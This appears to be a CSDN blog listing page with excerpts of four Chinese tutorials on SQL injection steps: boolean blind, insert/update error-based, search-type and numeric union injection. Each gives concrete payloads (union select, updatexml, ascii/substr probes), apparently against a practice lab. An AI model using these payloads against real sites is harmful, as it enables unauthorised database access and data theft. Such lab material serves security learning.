![](https://img-blog.csdnimg.cn/20201014180756913.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
web渗透
新时代的小菜b
这个作者很懒,什么都没留下…
展开
-
SQL注入之常见注入的步骤④
SQL注入之常见注入的步骤④盲注:(布尔)①判断注入:name=kobe’ and 1=1 %23 正常, name=kobe’ and 1=2 报错 存在注入②通过length判断数据库的长度name=kobe’ and length (database())>6 %23 正常,>7报错 所以长度为7③判断数据库第一位的ascii值name=kobe’ and ascii(substr(database(),1,1))>111 正常 >112报错 所以库的第一位asci原创 2020-11-11 15:30:19 · 207 阅读 · 0 评论 -
SQL注入之常见注入的步骤③
sql注入之常见注入的操作步骤insert/update 注入 (俩种方法注入相同)update注入 (在修改信息的时候,后台就是通过update去找操作的)insert注入(insert 注入是指我们前端注册的信息,后台就是通过insert这个操作插入到数据库中)①在注册信息处抓包②insert判断注入:单引号报错 存在注入,报错信息为’1234’),‘1’1’1’1)③基于报错信息进行注入,构造payload爆数据库:1234’ or updatexml(1,concat(0x7e,(s原创 2020-11-11 14:43:38 · 259 阅读 · 0 评论 -
SQL注入之常见注入的步骤②
sql注入之常见注入的步骤②搜索型注入①判断注入: 1’ and 1=1 正确 and 1=2 报错②判断列数:1’ order by 3 %23 正确 1’ order by 4 报错③爆数据库:id=-1’ and updatexml(1,concat(select database()),1)%23④爆数据表:id=-1’ and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where原创 2020-11-10 16:58:25 · 152 阅读 · 0 评论 -
SQL注入之常见注入的步骤①
SQL注入之常见的注入步骤(1)数字型注入第一步:抓包第二步:判断注入 id=1 and 1=1 正确 id=1 and1=2 报错第三步:判断列数 id=1 order by 3 报错 order by 2 正确 (依此可以判断为2列)第四步:爆显示位 :id=-1 union select 1,2 (可以爆出1或哪个是显示位)第五步:爆数据库:id=-1 union select 1,database() (在2列上爆数据库)第六步:爆数据表:id=-1 union select 1,t原创 2020-11-10 15:47:43 · 277 阅读 · 0 评论